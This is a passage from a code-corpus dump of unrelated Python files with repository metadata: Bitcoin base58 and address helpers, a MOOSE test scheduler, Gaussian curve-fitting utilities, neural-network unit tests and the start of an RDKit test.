result = __b58chars[long_value] + result
# Bitcoin does a little leading-zero-compression:
# leading 0-bytes in the input become leading-1s
nPad = 0
for c in v:
if c == '\0': nPad += 1
else: break
return (__b58chars[0]*nPad) + result
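# Example: b58encode('\x00\x01') == '12' -- the leading zero byte becomes a
# leading '1' (the zeroth base58 character) and the value 1 maps to '2'.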
def b58decode(v, length):
""" decode v into a string of len bytes."""
long_value = 0L
for (i, c) in enumerate(v[::-1]):
long_value += __b58chars.find(c) * (__b58base**i)
result = ''
while long_value >= 256:
div, mod = divmod(long_value, 256)
result = chr(mod) + result
long_value = div
result = chr(long_value) + result
nPad = 0
for c in v:
if c == __b58chars[0]: nPad += 1
else: break
result = chr(0)*nPad + result
if length is not None and len(result) != length:
return None
return result
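# Example: b58decode('12', None) == '\x00\x01', inverting the encoding above;
# passing an explicit `length` returns None on a size mismatch.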
__b58chars = '123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz'
__b58base = len(__b58chars)
def EncodeBase58Check(vchIn):
hash = Hash(vchIn)
return b58encode(vchIn + hash[0:4])
def DecodeBase58Check(psz):
vchRet = b58decode(psz, None)
key = vchRet[0:-4]
csum = vchRet[-4:]
hash = Hash(key)
cs32 = hash[0:4]
if cs32 != csum:
return None
else:
return key
def public_key_to_bc_address(public_key):
h160 = hash_160(public_key)
return hash_160_to_bc_address(h160)
def hash_160(public_key):
try:
md = hashlib.new('ripemd160')
md.update(hashlib.sha256(public_key).digest())
return md.digest()
except:
import ripemd
md = ripemd.new(hashlib.sha256(public_key).digest())
return md.digest()
def hash_160_to_bc_address(h160, addrtype = 0):
vh160 = chr(addrtype) + h160
h = Hash(vh160)
addr = vh160 + h[0:4]
return b58encode(addr)
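# Hash (below) is Bitcoin's standard double-SHA256; hash_160 above is
# SHA256 followed by RIPEMD-160, the usual pay-to-pubkey-hash digest.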
mnemonic_hash = lambda x: hmac_sha_512("Bitcoin mnemonic", x).encode('hex')
hmac_sha_512 = lambda x,y: hmac.new(x, y, hashlib.sha512).digest()
Hash = lambda x: hashlib.sha256(hashlib.sha256(x).digest()).digest()
|
ohadcn/vanityBrain
|
old_mnemonic.py
|
Python
|
gpl-3.0
| 23,497
|
[
"CRYSTAL",
"VisIt"
] |
ca9f2876a3f740d9506ea819c80d2f4c9bf7f317a9266c73906df9fbc6ddd569
|
#* This file is part of the MOOSE framework
#* https://www.mooseframework.org
#*
#* All rights reserved, see COPYRIGHT for full restrictions
#* https://github.com/idaholab/moose/blob/master/COPYRIGHT
#*
#* Licensed under LGPL 2.1, please see LICENSE for details
#* https://www.gnu.org/licenses/lgpl-2.1.html
from TestHarness.schedulers.Scheduler import Scheduler
from TestHarness import util
class RunParallel(Scheduler):
"""
RunParallel is a Scheduler plugin responsible for executing a tester
command and doing something with its output.
"""
@staticmethod
def validParams():
params = Scheduler.validParams()
return params
def __init__(self, harness, params):
Scheduler.__init__(self, harness, params)
def run(self, job):
""" Run a tester command """
tester = job.getTester()
# Do not execute app, and do not processResults
if self.options.dry_run:
self.setSuccessfulMessage(tester)
return
# Launch and wait for the command to finish
job.run()
# Was this job already considered finished? (Timeout, Crash, etc)
if job.isFinished():
return
# Allow derived processResults to process the output and set a failing status (if it failed)
job_output = job.getOutput()
output = tester.processResults(tester.getMooseDir(), self.options, job_output)
# If the tester has not yet failed, append additional information to output
if not tester.isFail():
# Read the output either from the temporary file or redirected files
if tester.hasRedirectedOutput(self.options):
redirected_output = util.getOutputFromFiles(tester, self.options)
output += redirected_output
# If we asked for redirected output but none was found, we'll call that a failure
if redirected_output == '':
tester.setStatus(tester.fail, 'FILE TIMEOUT')
output += '\n' + "#"*80 + '\nTester failed, reason: ' + tester.getStatusMessage() + '\n'
else:
output += '\n' + "#"*80 + '\nTester failed, reason: ' + tester.getStatusMessage() + '\n'
# Set testers output with modifications made above so it prints the way we want it
job.setOutput(output)
# Test has not yet failed and we are finished... therefore it is a passing test
if not tester.isFail():
self.setSuccessfulMessage(tester)
def setSuccessfulMessage(self, tester):
""" properly set a finished successful message for tester """
message = ''
# Handle 'dry run' first, because if true, job.run() never took place
if self.options.dry_run:
message = 'DRY RUN'
elif tester.specs['check_input']:
message = 'SYNTAX PASS'
elif self.options.scaling and tester.specs['scale_refine']:
message = 'SCALED'
elif self.options.enable_recover and tester.specs.isValid('skip_checks') and tester.specs['skip_checks']:
message = 'PART1'
tester.setStatus(tester.success, message)
|
nuclear-wizard/moose
|
python/TestHarness/schedulers/RunParallel.py
|
Python
|
lgpl-2.1
| 3,186
|
[
"MOOSE"
] |
7571612ddccd774a69d9fbdd1a9e0ce7a1d5a9c47459ccfe912c61f42b2d0cf9
|
import numpy as np
import stsci.tools.nmpfit as mpfit
from numpy.polynomial.chebyshev import Chebyshev as CC
def gaussian4(p, x):
''' gaussian model
p[0] -- scale factor
p[1] -- centroid
p[2] -- sigma
p[3] -- offset
Area: (p[0]-p[3]) x p[2] x np.sqrt(2 x pi)
'''
u = (x - p[1])/p[2]
return p[0]*np.exp(-0.5*u*u) + p[3]
def gaussian5(p, x):
''' gaussian model
p[0] -- scale factor
p[1] -- centroid
p[2] -- sigma
p[3] -- offset
p[4] -- slope
Area: (p[0]-p[3]) x p[2] x np.sqrt(2 x pi)
'''
u = (x - p[1])/p[2]
return p[0]*np.exp(-0.5*u*u) + p[3] + p[4]*x
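# Quick check of the models above: with p = [2.0, 0.0, 1.0, 0.5] the peak sits
# at x = 0, so gaussian4(p, 0.0) == 2.0*exp(0) + 0.5 == 2.5.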
def sedm_wavelen(p, x):
''' SED Machine wavelength function: cubic polynomial in x
with coefficients p = (A, B, C, D)
'''
A, B, C, D = p
return A + B*x + C*x**2 + D*x**3
def mpfit_residuals(modelfun, preffun=None):
'''Returns a residual function for mpfit code'''
def fun(param, fjac=None, x=None, y=None, error=None):
'''Generic function'''
model = modelfun(param, x)
status = 0
if preffun is not None:
# There is a parameter preference
prefval = preffun(param)
else:
prefval = 1.0
if error is None:
return [status, (y-model) * prefval]
return [status, (y-model)/error*prefval]
return fun
def mpfit_do(residual_fun, # function returned from mpfit_residuals() above
x, # input x
y, # input y = f(x)
parinfo, # initial parameter guess
error=None,
quiet=1,
maxiter=20):
'''Returns mpfit fit structure for residual fun
Args:
residual_fun: residual_fun from mpfit_residuals
x, y: x and y data values
parinfo: Structure containing mpfit pars see
help(mpfit)
Example:
g4res = Fit.mpfit_residuals(Fit.gaussian4)
parguess = [{'value': 1600}, {'value': 0}, {'value': 2}, {'value': 200}]
fit = Fit.mpfit_do(g4res, xs, prof, parguess)'''
fa = {"x": x, "y": y}
if error is not None:
fa["error"] = error
lsf = mpfit.mpfit(residual_fun, parinfo=parinfo, functkw=fa,
quiet=quiet, maxiter=maxiter)
return lsf
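# A minimal usage sketch for the helpers above (illustrative values only):
#
# xs = np.linspace(-5.0, 5.0, 101)
# truth = [10.0, 0.5, 1.2, 2.0]  # scale, centroid, sigma, offset
# ys = gaussian4(truth, xs) + np.random.normal(0.0, 0.1, xs.size)
# g4res = mpfit_residuals(gaussian4)
# parguess = [{'value': 8.0}, {'value': 0.0}, {'value': 1.0}, {'value': 1.0}]
# lsf = mpfit_do(g4res, xs, ys, parguess)
# lsf.params  # should land close to `truth`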
|
nickkonidaris/kpy
|
NPK/Fit.py
|
Python
|
gpl-2.0
| 2,232
|
[
"Gaussian"
] |
cfcd6effb0f0b665af50a8d5b0811a5e059a8bb6866bfe1e54d448e5425c2706
|
import unittest
from Ann import Ann
import numpy as np
import random
import copy
import os
import pickle
class Test(unittest.TestCase):
def test_1(self):
# Test for Ann Architecture#
# First architecture test#
n_i1 = 4 # Number of input neurons
n_h1 = 2 # Number of hidden layers
n_o1 = 1 # Number of output neurons
ann1 = Ann(n_i=n_i1, n_h=n_h1, n_o=n_o1) # Create this architecture
self.assertEqual(n_i1, ann1.n_i)
self.assertEqual(n_h1, ann1.n_h)
self.assertEqual(n_o1, ann1.n_o)
self.assertEqual(ann1.s, [5, 5, 5, 2])
self.assertEqual(len(ann1.Thetas), 3)
self.assertEqual(ann1.Thetas[0].shape, (4, 5))
self.assertEqual(ann1.Thetas[1].shape, (4, 5))
self.assertEqual(ann1.Thetas[2].shape, (1, 5))
# Second architecture test#
n_i2 = 10 # Number of input neurons
n_h2 = 1 # Number of hidden layers
n_o2 = 2 # Number of output neurons
ann2 = Ann(n_i=n_i2, n_h=n_h2, n_o=n_o2) # Create this architecture
self.assertEqual(n_i2, ann2.n_i)
self.assertEqual(n_h2, ann2.n_h)
self.assertEqual(n_o2, ann2.n_o)
self.assertEqual(ann2.s, [11, 11, 3])
self.assertEqual(len(ann2.Thetas), 2)
self.assertEqual(ann2.Thetas[0].shape, (10, 11))
self.assertEqual(ann2.Thetas[1].shape, (2, 11))
# Third architecture test#
n_i3 = 100 # Number of input neurons
n_h3 = 0 # Number of hidden layers
n_o3 = 10 # Number of output neurons
ann3 = Ann(n_i=n_i3, n_h=n_h3, n_o=n_o3) # Create this architecture
self.assertEqual(n_i3, ann3.n_i)
self.assertEqual(n_h3, ann3.n_h)
self.assertEqual(n_o3, ann3.n_o)
self.assertEqual(ann3.s, [101, 11])
self.assertEqual(len(ann3.Thetas), 1)
self.assertEqual(ann3.Thetas[0].shape, (10, 101))
n_i4 = 1500 # Number of input neurons
n_h4 = 3 # Number of hidden layers
n_o4 = 6 # Number of output neurons
# Fourth architecture test#
ann4 = Ann(n_i=n_i4, n_h=n_h4, n_o=n_o4) # Create this architecture
self.assertEqual(n_i4, ann4.n_i)
self.assertEqual(n_h4, ann4.n_h)
self.assertEqual(n_o4, ann4.n_o)
self.assertEqual(ann4.s, [1501, 31 + 1, 31 + 1, 31 + 1, 6 + 1])
self.assertEqual(len(ann4.Thetas), 4)
self.assertEqual(ann4.Thetas[0].shape, (31, 1501))
self.assertEqual(ann4.Thetas[1].shape, (31, 32))
self.assertEqual(ann4.Thetas[2].shape, (31, 32))
self.assertEqual(ann4.Thetas[3].shape, (6, 32))
# Fourth (arbitrary) architecture test#
s = [3, 2]
n_i = 4
n_h = len(s)
n_o = 2
ann1 = Ann(s=s, n_i=n_i, n_h=n_h, n_o=n_o) # Create this architecture
self.assertEqual(n_i, ann1.n_i)
self.assertEqual(n_h, ann1.n_h)
self.assertEqual(n_o, ann1.n_o)
self.assertEqual(ann1.s, [5, 3, 2, 3])
self.assertEqual(len(ann1.Thetas), 3)
self.assertEqual(ann1.Thetas[0].shape, (2, 5))
self.assertEqual(ann1.Thetas[1].shape, (1, 3))
self.assertEqual(ann1.Thetas[2].shape, (2, 2))
def test_2(self):
# Test for forward-propagation#
# First architecture test#
# Logistic regression (0 hidden layers) forward propagation test#
n_i1 = 4 # Number of input neurons
n_h1 = 0 # Number of hidden layers
n_o1 = 1 # Number of output neurons
ann1 = Ann(n_i=n_i1, n_h=n_h1, n_o=n_o1) # Create this architecture
x1 = [1, 2, 3, 4] # Array as first example
x2 = [-1, -1, -1, -1] # Array as second example
# Set all weights to zero#
for i in range(0, len(ann1.Thetas)):
shape = ann1.Thetas[i].shape
self.assertEqual(shape, (1, 5))
ann1.Thetas[i] = np.zeros(shape)
self.assertEqual(ann1.h(x1), 0.5)
self.assertEqual(ann1.h(x2), 0.5)
# Set all weights to one#
for i in range(0, len(ann1.Thetas)):
shape = ann1.Thetas[i].shape
self.assertEqual(shape, (1, 5))
ann1.Thetas[i] = np.ones(shape)
self.assertAlmostEqual(ann1.h(x1), 0.999, delta=0.001)
self.assertAlmostEqual(ann1.h(x2), 0.0474, delta=0.0001)
# Set all weights randomly between -1 and 1 (and test the range of output)#
ann1 = Ann(n_i=n_i1, n_h=n_h1, n_o=n_o1) # Create this architecture
self.assertAlmostEqual(ann1.h(x1), 0.5, delta=0.5) # Sigmoid always gives values between 0 and 1
self.assertAlmostEqual(ann1.h(x2), 0.5, delta=0.5)
# Custom Thetas weights#
M = np.matrix([[1, -1, 0.5, -0.3, 2]])
ann1.Thetas[0] = M
self.assertAlmostEqual(ann1.h(x1), 0.786, delta=0.001)
self.assertAlmostEqual(ann1.h(x2), 0.858, delta=0.001)
# Second architecture test#
# 1 hidden layer forward propagation test#
n_i1 = 4 # Number of input neurons
n_h1 = 1 # Number of hidden layers
n_o1 = 1 # Number of output neurons
ann1 = Ann(n_i=n_i1, n_h=n_h1, n_o=n_o1) # Create this architecture
x1 = [1, 2, 3, 4] # Array as first example
x2 = [-1, -1, -1, -1] # Array as second example
# Set all weights to zero#
for i in range(0, len(ann1.Thetas)):
shape = ann1.Thetas[i].shape
ann1.Thetas[i] = np.zeros(shape)
self.assertEqual(ann1.h(x1), 0.5)
self.assertEqual(ann1.h(x2), 0.5)
# Set all weights to one#
for i in range(0, len(ann1.Thetas)):
shape = ann1.Thetas[i].shape
ann1.Thetas[i] = np.ones(shape)
self.assertAlmostEqual(ann1.h(x1), 0.993, delta=0.001)
self.assertAlmostEqual(ann1.h(x2), 0.767, delta=0.001)
# Set all weights randomly between -1 and 1 (and test the range of output)#
ann1 = Ann(n_i=n_i1, n_h=n_h1, n_o=n_o1) # Create this architecture
self.assertAlmostEqual(ann1.h(x1), 0.5, delta=0.5) # Sigmoid always gives values between 0 and 1
self.assertAlmostEqual(ann1.h(x2), 0.5, delta=0.5)
# Custom Thetas weights#
M1 = np.matrix([[1, -1, 0.5, -0.3, 2],
[1, -1, 0.5, -0.3, 2],
[1, -1, 0.5, -0.3, 2],
[1, -1, 0.5, -0.3, 2]])
M2 = np.matrix([[1, 1, -1, 0.5, -1]])
ann1.Thetas[0] = M1
ann1.Thetas[1] = M2
# a^(1) Should be [0.786 0.786 0.786 0.786 1]^T#
self.assertAlmostEqual(ann1.h(x1), 0.545, delta=0.001)
# a^(1) Should be [0.858 0.858 0.858 0.858 1]^T#
self.assertAlmostEqual(ann1.h(x2), 0.571, delta=0.001)
def test_3(self):
# Test the dimensions of the Jacobian matrices against Theta matrices for first architecture#
n_i1 = 4 # Number of input neurons
n_h1 = 2 # Number of hidden layers
n_o1 = 2 # Number of output neurons
ann1 = Ann(n_i=n_i1, n_h=n_h1, n_o=n_o1) # Create this architecture
x1 = [1, 2, 3, 4] # Array as first example
y1 = [1, 0]
J = ann1.backward(x1, y1)
for l in range(0, ann1.L - 1):
self.assertEqual(ann1.Thetas[l].shape, J[l].shape)
# Test the dimensions of the Jacobian matrices against Theta matrices for second architecture#
n_i1 = 40 # Number of input neurons
n_h1 = 3 # Number of hidden layers
n_o1 = 10 # Number of output neurons
ann1 = Ann(n_i=n_i1, n_h=n_h1, n_o=n_o1) # Create this architecture
x1 = 10 * [1, 2, 3, 4] # Array as first example
y1 = [1, 0, 1, 1, 0, 0, 1, 0, 1, 0]
J = ann1.backward(x1, y1)
for l in range(0, ann1.L - 1):
self.assertEqual(ann1.Thetas[l].shape, J[l].shape)
# Test the dimensions of the Jacobian matrices against Theta matrices for third architecture#
n_i1 = 40 # Number of input neurons
n_h1 = 0 # Number of hidden layers
n_o1 = 10 # Number of output neurons
ann1 = Ann(n_i=n_i1, n_h=n_h1, n_o=n_o1) # Create this architecture
x1 = 10 * [1, 2, 3, 4] # Array as first example
y1 = [1, 0, 1, 1, 0, 0, 1, 0, 1, 0]
J = ann1.backward(x1, y1)
for l in range(0, ann1.L - 1):
self.assertEqual(ann1.Thetas[l].shape, J[l].shape)
def test_4(self):
# Gradient checking (check that a numerical approximation of the gradient is equal to our backpropagation derivation)#
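# Central difference used below: dJ/dTheta_ij ~ (J(Theta + eps*E_ij) - J(Theta - eps*E_ij)) / (2*eps),
# where E_ij is the matrix with a single 1 at position (i, j).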
# First data-set with one example
arrs = []
labels = []
arrs.append([1, 2, 4, 5, 5, 5])
labels.append('cat')
ann = Ann(arrs, labels, n_h=10) # Create Ann with these train_examples and labels
J = ann.backward(ann.train_examples[0].arr, ann.train_examples[0].y)
T_original = copy.deepcopy(ann.Thetas)
for l in range(0, ann.L - 1):
shape_J = J[l].shape
eps = 0.0001 # epsilon for a numerical approximation of the gradient
for i in range(0, shape_J[0]):
for j in range(0, shape_J[1]):
T_e = np.zeros(shape_J) # Matrix of zeros
T_e[i][j] = eps
ann.Thetas[l] = T_original[l] + T_e
cost_e = ann.cost() # Cost at Theta + eps
ann.Thetas[l] = T_original[l] - T_e
cost_minus_e = ann.cost() # Cost at Theta - eps
P = (cost_e - cost_minus_e) / (2 * eps) # Numerical approximation
J_ij = J[l].item(i, j) # Backpropagation derivation
# print(P, '\t', J_ij, '\t', abs(P - J_ij), (l, i, j))
# if (P < 0 and J_ij > 0 or P > 0 and J_ij < 0):
# self.fail()
self.assertAlmostEqual(P, J_ij, delta=0.001)
ann.Thetas = copy.deepcopy(T_original)
# Second data-set with several train_examples
arrs = []
labels = []
classes = ('cat', 'dog')
for m in range(0, 100):
arr = [random.random() for x in range(0, 20)]
label = classes[random.random() > 0.5]
arrs.append(arr)
labels.append(label)
ann = Ann(arrs, labels, n_h=2) # Create Ann with these train_examples and labels
# L-1 matrices of partial derivatives for first example
J = ann.backward_batch()
T_original = copy.deepcopy(ann.Thetas)
for l in range(0, ann.L - 1):
shape_J = J[l].shape
eps = 0.0001 # epsilon for a numerical approximation of the gradient
a = random.sample(range(0, shape_J[0]), 2)
b = random.sample(range(0, shape_J[1]), 2)
for i in a:
for j in b:
T_e = np.zeros(shape_J) # Matrix of zeros
T_e[i][j] = eps
ann.Thetas[l] = T_original[l] + T_e
cost_e = ann.cost() # Cost at Theta + eps
ann.Thetas[l] = T_original[l] - T_e
cost_minus_e = ann.cost() # Cost at Theta - eps
P = (cost_e - cost_minus_e) / (2 * eps) # Numerical approximation
J_ij = J[l].item(i, j) # Backpropagation derivation
print(P, '\t', J_ij, '\t', abs(P - J_ij), (l, i, j))
# if (P < 0 and J_ij > 0 or P > 0 and J_ij < 0):
# self.fail()
self.assertAlmostEqual(P, J_ij, delta=0.001)
ann.Thetas = copy.deepcopy(T_original)
def test_5(self):
# Comprehensive gradient checking #
# Medium size data-set with more than two classes
arrs = []
labels = []
classes = ('cat', 'dog', 'bird', 'turtle', 'dinosaur', 'human')
for m in range(0, 100):
arr = [random.random() for x in range(0, 200)]
z = random.random()
if (z < 1 / 6):
label = classes[0]
elif (z >= 1 / 6 and z < 2 / 6):
label = classes[1]
elif (z >= 2 / 6 and z < 3 / 6):
label = classes[2]
elif (z >= 3 / 6 and z < 4 / 6):
label = classes[3]
elif (z >= 4 / 6 and z < 5 / 6):
label = classes[4]
else:
label = classes[5]
arrs.append(arr)
labels.append(label)
ann = Ann(arrs, labels, n_h=2) # Create Ann with these train_examples and labels
# L-1 matrices of partial derivatives for first example
J = ann.backward_batch()
T_original = copy.deepcopy(ann.Thetas)
# Just check the neuron connections between first, second, and third layer
for l in range(0, 2):
shape_J = J[l].shape
eps = 0.0001 # epsilon for a numerical approximation of the gradient
# Randomly select 100 neuron connections to check
a = random.sample(range(0, shape_J[0]), 10)
b = random.sample(range(0, shape_J[1]), 10)
for i in a:
for j in b:
T_e = np.zeros(shape_J) # Matrix of zeros
T_e[i][j] = eps
ann.Thetas[l] = T_original[l] + T_e
cost_e = ann.cost() # Cost at Theta + eps
ann.Thetas[l] = T_original[l] - T_e
cost_minus_e = ann.cost() # Cost at Theta - eps
P = (cost_e - cost_minus_e) / (2 * eps) # Numerical approximation
J_ij = J[l].item(i, j) # Backpropagation derivation
print(P, '\t', J_ij, '\t', abs(P - J_ij), (l, i, j))
# if (P < 0 and J_ij > 0 or P > 0 and J_ij < 0):
# self.fail()
self.assertAlmostEqual(P, J_ij, delta=0.001)
ann.Thetas = copy.deepcopy(T_original)
def test_6(self):
# Test if training works by checking that training lowers the cost for random small and medium size data-sets#
# Small size random data-set with two labels
arrs = []
labels = []
classes = ('cat', 'dog')
for i in range(0, 2):
print('\nTesting data-set ' + str(i))
for m in range(0, 10):
arr = [random.random() for x in range(0, 3)]
label = classes[random.random() > 0.5]
arrs.append(arr)
labels.append(label)
ann = Ann(arrs, labels) # Create Ann with these train_examples and labels
cost_before = ann.cost()
ann.train()
cost_after = ann.cost()
self.assertTrue(cost_after <= cost_before)
# Medium size random data-set with three labels
arrs = []
labels = []
classes = ('cat', 'dog', 'bird')
for i in range(0, 2):
print('\nTesting data-set ' + str(i))
for m in range(0, 50):
arr = [random.random() for x in range(0, 10)]
z = random.random()
if (z < 0.33):
label = classes[0]
elif (z >= 0.33 and z < 0.66):
label = classes[1]
else:
label = classes[2]
arrs.append(arr)
labels.append(label)
ann = Ann(arrs, labels) # Create Ann with these train_examples and labels
cost_before = ann.cost()
ann.train()
cost_after = ann.cost()
self.assertTrue(cost_after <= cost_before)
def test_7(self):
# Learn some basic functions#
# Linearly-separable data-sets#
# function 1 (AND function) on 0 hidden layers
arrs = []
arrs.append([0, 0])
arrs.append([0, 1])
arrs.append([1, 0])
arrs.append([1, 1])
labels = []
labels.append('false')
labels.append('true')
labels.append('true')
labels.append('true')
ann = Ann(arrs, labels, n_h=0)
ann.train()
ann.validate_train()
# Check to see if train_accuracy is over 90%
self.assertTrue(ann.train_accuracy() > 0.9)
# function 2 on 2 hidden layers
arrs = []
arrs.append([1, 1])
arrs.append([2, 2])
arrs.append([1, 3])
arrs.append([2, 10])
arrs.append([1, -1])
arrs.append([-2, -2])
arrs.append([1, -3])
arrs.append([-2, -10])
labels = []
labels.append('false')
labels.append('false')
labels.append('false')
labels.append('false')
labels.append('true')
labels.append('true')
labels.append('true')
labels.append('true')
ann = Ann(arrs, labels, n_h=2)
ann.train()
ann.validate_train()
# Check to see if train_accuracy is over 90%
self.assertTrue(ann.train_accuracy() > 0.9)
# Non-linearly-separable data-sets#
'''
# function 1 (XOR function) on 1 hidden layers
arrs = []
arrs.append([0, 0])
arrs.append([0, 1])
arrs.append([1, 0])
arrs.append([1, 1])
labels = []
labels.append('false')
labels.append('true')
labels.append('true')
labels.append('false')
ann = Ann(arrs, labels, n_h=1)
ann.train()
ann.validate_train()
# Check to see if train_accuracy is over 90%
self.assertTrue(ann.train_accuracy() > 0.9)
# function 1b (XOR function) on 1 hidden layers (with custom architecture)
arrs = []
arrs.append([0, 0])
arrs.append([0, 1])
arrs.append([1, 0])
arrs.append([1, 1])
labels = []
labels.append('false')
labels.append('true')
labels.append('true')
labels.append('false')
s = [4, 5] # Custom hidden layer architecture
ann = Ann(arrs, labels, n_h=len(s), s=s)
ann.train()
ann.validate_train()
# Check to see if train_accuracy is over 90%
self.assertTrue(ann.train_accuracy() > 0.9)
'''
# function 1 (two separated point sets) on 0 hidden layers
arrs = []
arrs.append([0, 0])
arrs.append([0, 1])
arrs.append([1, 1])
arrs.append([1, 1])
arrs.append([10, 0])
arrs.append([0, 10])
arrs.append([110, 10])
arrs.append([-10, 10])
labels = []
labels.append('false')
labels.append('false')
labels.append('false')
labels.append('false')
labels.append('true')
labels.append('true')
labels.append('true')
labels.append('true')
ann = Ann(arrs, labels, n_h=0)
ann.train()
ann.validate_train()
# Check to see if train_accuracy is over 90%
self.assertTrue(ann.train_accuracy() > 0.9)
def test_8(self):
# First test#
# 1 hidden layer cost test with regularization#
x1 = [1, 2, 3, 4] # Array as first example
y1 = 'yes'
arrs = []
labels = []
arrs.append(x1)
labels.append(y1)
ann1 = Ann(arrs, labels, n_h=1) # Create this architecture
# Custom Thetas weights#
M1 = np.matrix([[1, -1, 0.5, -0.3, 2],
[1, -1, 0.5, -0.3, 2],
[1, -1, 0.5, -0.3, 2],
[1, -1, 0.5, -0.3, 2]])
M2 = np.matrix([[1, 1, -1, 0.5, -1]])
ann1.Thetas[0] = M1
ann1.Thetas[1] = M2
cost_0 = ann1.cost() # lam equals 0
cost_1 = ann1.cost(lam=1) # lam equals 1
self.assertTrue(cost_1 > cost_0) # Cost with regularization penalty is always higher than without regularization
# Gradient checking (now with regularization)#
# Medium size data-set with several train_examples
lam_test = 1 # Regularization parameter
arrs = []
labels = []
classes = ('cat', 'dog')
for m in range(0, 100):
arr = [random.random() for x in range(0, 40)]
label = classes[random.random() > 0.5]
arrs.append(arr)
labels.append(label)
ann = Ann(arrs, labels, n_h=2) # Create Ann with these train_examples and labels
# L-1 matrices of partial derivatives for first example
J = ann.backward_batch(lam=lam_test, batch=1) # Use full-batch for gradient descent
T_original = copy.deepcopy(ann.Thetas)
for l in range(0, ann.L - 1):
shape_J = J[l].shape
eps = 0.0001 # epsilon for a numerical approximation of the gradient
a = random.sample(range(0, shape_J[0]), 2)
b = random.sample(range(0, shape_J[1]), 2)
for i in a:
for j in b:
T_e = np.zeros(shape_J) # Matrix of zeros
T_e[i][j] = eps
ann.Thetas[l] = T_original[l] + T_e
cost_e = ann.cost(lam=lam_test) # Cost at Theta + eps
ann.Thetas[l] = T_original[l] - T_e
cost_minus_e = ann.cost(lam=lam_test) # Cost at Theta - eps
P = (cost_e - cost_minus_e) / (2 * eps) # Numerical approximation
J_ij = J[l].item(i, j) # Backpropagation derivation
# print(P, '\t', J_ij, '\t', abs(P - J_ij), (l, i, j))
# if (P < 0 and J_ij > 0 or P > 0 and J_ij < 0):
# self.fail()
self.assertAlmostEqual(P, J_ij, delta=0.001)
ann.Thetas = copy.deepcopy(T_original)
def test_9(self):
'''
# function 1 (XOR function) on 1 hidden layers
arrs = []
arrs.append([0, 0])
arrs.append([0, 1])
arrs.append([1, 0])
arrs.append([1, 1])
labels = []
labels.append('false')
labels.append('true')
labels.append('true')
labels.append('false')
ann = Ann(arrs, labels, n_h=1)
# Train and save model
model = ann.train()[0][0] # Take the first model from the list of models in the tuple
ann.validate_train()
# Check to see if train_accuracy is over 90%
self.assertTrue(ann.train_accuracy() > 0.9)
# Load the trained model into a new neural network
ann_from_model = Ann(model)
# Evaluate some vectors using this neural network initialized only with a model
self.assertEqual(ann_from_model.h_by_class(arrs[0]), 'false')
self.assertEqual(ann_from_model.h_by_class(arrs[1]), 'true')
x = [1.1, 0.9]
self.assertEqual(ann_from_model.h_by_class(x), 'false')
'''
# function 2 on 2 hidden layers
arrs2 = []
arrs2.append([1, 1])
arrs2.append([2, 2])
arrs2.append([1, 3])
arrs2.append([2, 10])
arrs2.append([1, -1])
arrs2.append([-2, -2])
arrs2.append([1, -3])
arrs2.append([-2, -10])
labels2 = []
labels2.append('false')
labels2.append('false')
labels2.append('false')
labels2.append('false')
labels2.append('true')
labels2.append('true')
labels2.append('true')
labels2.append('true')
ann = Ann(arrs2, labels2, n_h=2)
model2 = ann.train()[0][0]
ann.validate_train()
# Load the second model
ann_from_model = Ann(model2)
# Evaluate some vectors using this neural network initialized only with a model
self.assertEqual(ann_from_model.h_by_class(arrs2[0]), 'false')
self.assertEqual(ann_from_model.h_by_class(arrs2[len(arrs2) - 1]), 'true')
x = [1, -5]
self.assertEqual(ann_from_model.h_by_class(x), 'true')
# Reload the second model (the first model's block above is commented out,
# so `model` and `arrs` are not defined at this point)
ann_from_model = Ann(model2)
# Evaluate some vectors using this neural network initialized only with a model
self.assertEqual(ann_from_model.h_by_class(arrs2[0]), 'false')
self.assertEqual(ann_from_model.h_by_class(arrs2[len(arrs2) - 1]), 'true')
x = [1, -5]
self.assertEqual(ann_from_model.h_by_class(x), 'true')
# Try pickling our model into a sister folder
model_name = model2.name
directory = '../Ann-models'
path_to_file = directory + '/' + model_name
if not os.path.exists(directory):
os.makedirs(directory)
pickle.dump(model2, open(path_to_file, 'wb'))
# Try unpickling our model
unpickled_model = pickle.load(open(path_to_file, 'rb'))
# Load unpickled model and test
ann_from_pickle = Ann(unpickled_model)
# Evaluate some vectors using this neural network initialized only with a model
self.assertEqual(ann_from_pickle.h_by_class(arrs2[0]), 'false')
self.assertEqual(ann_from_pickle.h_by_class(arrs2[len(arrs2) - 1]), 'true')
x = [1, -5]
self.assertEqual(ann_from_pickle.h_by_class(x), 'true')
def test_10(self):
'''Creates a fake data-set with points labeled 'yes' around origin and points labeled 'no' outside'''
arrs = []
labels = []
'''Points about the origin (located in a box of length 16 centered at origin)'''
for i in range(0, 100):
arr = [random.randint(0, 8) * np.sign(random.random() - 0.5) for x in range(0, 2)]
label = 'yes'
arrs.append(arr)
labels.append(label)
'''Points outside the box'''
for i in range(0, 100):
arr = [random.randint(10, 20) * np.sign(random.random() - 0.5) for x in range(0, 2)]
label = 'no'
arrs.append(arr)
labels.append(label)
'''Add some noise'''
for i in range(0, 10):
arr = [random.randint(0, 8) * np.sign(random.random() - 0.5) for x in range(0, 2)]
label = 'no' # Note: this is artificially misclassified
arrs.append(arr)
labels.append(label)
for i in range(0, 10):
arr = [random.randint(10, 20) * np.sign(random.random() - 0.5) for x in range(0, 2)]
label = 'yes' # Note: this is artificially misclassified
arrs.append(arr)
labels.append(label)
ann = Ann(arrs, labels, n_h=2)
(models, test_accuracies, test_costs) = ann.train()
best_test_accuracy = 0
best_i = -1
for i in range(0, len(test_accuracies)):
if (test_accuracies[i] > best_test_accuracy):
best_test_accuracy = test_accuracies[i]
best_i = i
if (best_i > -1):
model_name = models[best_i].name
directory = '../Ann-models'
path_to_file = directory + '/' + model_name
if not os.path.exists(directory):
os.makedirs(directory)
pickle.dump(models[best_i], open(path_to_file, 'wb'))
else:
print('Error!')
if __name__ == "__main__":
unittest.main()
|
kod3r/Ann
|
Ann-py/Ann_test.py
|
Python
|
mit
| 27,969
|
[
"NEURON"
] |
7c2d8a297a3e92417528862efa8fe23d2ee45a937b8a3c92e35987fb2c7a104f
|
#
# Copyright (C) 2020 Greg Landrum and T5 Informatics GmbH
# @@ All Rights Reserved @@
#
# This file is part of the RDKit.
# The contents are covered by the terms of the BSD license
# which is included in the file license.txt, found at the root
# of the RDKit source tree.
#
from rdkit import Chem
from rdkit.Chem import rdAbbreviations
import unittest
class TestCase(unittest.TestCase):
def setUp(self):
self.defaultAbbrevs = rdAbbreviations.GetDefaultAbbreviations()
